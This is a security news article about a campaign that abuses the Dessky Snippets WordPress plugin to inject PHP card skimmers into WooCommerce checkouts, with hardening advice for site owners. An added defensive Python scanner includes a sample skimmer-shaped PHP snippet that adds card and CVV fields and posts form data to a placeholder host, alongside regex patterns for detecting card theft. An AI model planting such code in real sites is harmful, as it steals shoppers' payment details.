WordPress Plugin Misused to Steal Credit Card Data

Unknown cybercriminals are exploiting lesser-known code snippet plugins for WordPress to embed malicious PHP code in websites, enabling them to steal credit card information.

In May 2024, security firm Sucuri observed a campaign abusing a WordPress plugin called Dessky Snippets, which lets site administrators add custom PHP code to a site. The plugin has over 200 active installations.

Attacks of this kind typically exploit known vulnerabilities in other WordPress plugins, or brute-force weak credentials, to obtain administrator access. Once in, the attackers can install additional plugins, legitimate or malicious, to extend their foothold; a code snippet plugin is attractive precisely because it is legitimate and gives them arbitrary PHP execution without dropping a file.

In this campaign, the Dessky Snippets plugin is used to plant server-side PHP credit card skimming code on compromised sites. Because the skimmer runs in PHP on the server, the exfiltration request leaves from the web server rather than the shopper's browser, so browser-side defences such as Content Security Policy or client-side script monitoring will not see it.

“The malicious code was stored in the dnsp_settings option within the WordPress wp_options table and was crafted to alter the WooCommerce checkout process by modifying the billing form and injecting its own code,” a Sucuri researcher explained.

Specifically, the malware adds fields to the billing form that ask for card details: cardholder name, address, card number, expiry date and CVV. Whatever the shopper enters is then posted to the attacker-controlled URL “hxxps://2of[.]cc/wp-content/”.

One notable detail is that the injected billing fields have autocomplete disabled (autocomplete="off"). This keeps the browser from pre-filling them, so they stay blank until the shopper types into them, which avoids browser prompts around unexpected payment fields and makes the additions less conspicuous.
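The traits described above (PHP stored in a wp_options value, a hook into the WooCommerce checkout, injected card fields with autocomplete switched off, and an outbound request to a foreign host) can be turned into a simple scanner over a wp_options export. The following is an added example, not code from Sucuri, WordPress or Dessky Snippets; the indicator regexes, the sample rows and the exfil host `exfil.invalid` are constructed for illustration, and the hypothetical skimmer snippet in the sample data is modelled on the description, not copied from the campaign.

```python
"""Scan wp_options rows for server-side skimmer traits (constructed example)."""
import re
from urllib.parse import urlparse

# Indicator patterns for the traits described in the text. These are
# illustrative assumptions; tune them against known-good snippets before use.
PHP_CODE = re.compile(r"<\?php|\beval\s*\(|base64_decode\s*\(|\bcreate_function\s*\(", re.I)
CHECKOUT_HOOK = re.compile(r"woocommerce_(?:checkout|billing)\w*", re.I)
CARD_FIELDS = re.compile(r"card[\s_-]*(?:number|num)|\bcvv\b|\bcvc\b|expir", re.I)
# Matches autocomplete="off", autocomplete=\"off\" and PHP 'autocomplete'=>'off'
AUTOCOMPLETE_OFF = re.compile(r"autocomplete\W{0,6}off", re.I)
URL = re.compile(r"https?://[\w.-]+(?:/[^\s'\"\\]*)?", re.I)


def external_hosts(value, site_host):
    """Hosts referenced in the option value that are not the site itself."""
    hosts = set()
    for url in URL.findall(value):
        host = urlparse(url).hostname
        if host and host.lower() != site_host.lower():
            hosts.add(host.lower())
    return sorted(hosts)


def assess_option(name, value, site_host):
    """Return a finding dict for one wp_options row, or None if it looks benign."""
    traits = []
    if PHP_CODE.search(value):
        traits.append("php_code")
    if CHECKOUT_HOOK.search(value):
        traits.append("checkout_hook")
    if CARD_FIELDS.search(value):
        traits.append("card_fields")
    if AUTOCOMPLETE_OFF.search(value):
        traits.append("autocomplete_off")
    hosts = external_hosts(value, site_host)
    if hosts:
        traits.append("external_host")
    # PHP inside an option value is only expected from snippet plugins; PHP that
    # also touches the checkout, asks for card data or calls out to another
    # host has the shape of the skimmer described above.
    if "php_code" not in traits or len(traits) < 2:
        return None
    return {"option": name, "traits": traits, "hosts": hosts}


def scan_options(rows, site_host):
    """rows: iterable of (option_name, option_value), e.g. from
    SELECT option_name, option_value FROM wp_options."""
    findings = []
    for name, value in rows:
        finding = assess_option(name, value, site_host)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample rows standing in for a real wp_options export.
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    ("blogname", "Example Shop"),
    # Benign snippet: PHP, but no checkout hook, card field or external host.
    ("dnsp_settings_benign", "<?php add_filter('show_admin_bar', '__return_false');"),
    # Hypothetical skimmer-shaped snippet; exfil host is a placeholder, not the
    # domain reported in the campaign.
    ("dnsp_settings", (
        "<?php add_filter('woocommerce_billing_fields', function($f){"
        " $f['billing_card_number'] = ['label'=>'Card number','custom_attributes'=>['autocomplete'=>'off']];"
        " $f['billing_cvv'] = ['label'=>'CVV','custom_attributes'=>['autocomplete'=>'off']];"
        " return $f; });"
        " add_action('woocommerce_checkout_process', function(){"
        " wp_remote_post('https://exfil.invalid/wp-content/', ['body'=>$_POST]); });"
    )),
]

if __name__ == "__main__":
    for finding in scan_options(SAMPLE_ROWS, "shop.example"):
        print(finding)
```

Run against a dump of the live wp_options table, passing the site's own hostname so its own URLs are not counted as external. A legitimate snippet that customises billing fields will also trip `checkout_hook` and `card_fields`, so treat findings as items to review rather than verdicts, and add the domain reported for this campaign to whatever blocklist the `hosts` field is compared against.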

This isn't the first instance of threat actors turning legitimate code snippet plugins to malicious ends. Last month, the WPCode code snippet plugin was reported to have been misused to inject malicious JavaScript into WordPress sites, redirecting visitors to VexTrio domains.

Another malware campaign, named Sign1, has infected over 39,000 WordPress sites in the past six months by injecting malicious JavaScript through the Simple Custom CSS and JS plugin to redirect users to scam sites.

Owners of WordPress sites, especially those running e-commerce, are advised to keep WordPress core and plugins updated, use strong passwords to blunt brute-force attacks, and regularly review their sites for signs of malware or unauthorized changes. For this campaign in particular, that means checking the wp_options table (including snippet plugin settings such as dnsp_settings) for unexpected PHP, and comparing the live checkout form against the fields WooCommerce is supposed to render.

To harden an e-commerce site against skimming malware, keep every plugin and theme on its latest version, install only plugins from reputable sources, and remove any that are not needed: each unused plugin, code snippet plugins included, is one more way to run arbitrary PHP on the server. Use complex passwords, enable two-factor authentication for administrator accounts, and scan the site regularly for vulnerabilities and unauthorized changes.